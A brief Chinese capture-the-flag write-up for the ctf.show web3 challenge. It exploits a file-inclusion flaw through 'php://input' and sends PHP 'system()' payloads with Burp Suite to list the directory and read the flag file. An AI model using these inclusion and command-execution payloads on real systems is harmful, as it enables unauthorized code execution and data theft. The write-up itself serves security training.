ctf.show_web3 根据提示,判断类型为文件包含 payload:/?url=php://input,然后用burpsuite抓包 在请求body里写上 <?php system("ls")?> 查看一些当前目录下文件 出现名为ctf_go_go_go的文件 继续在请求头中写入 <?php system("cat ctf_go_go_go")?> 得到flag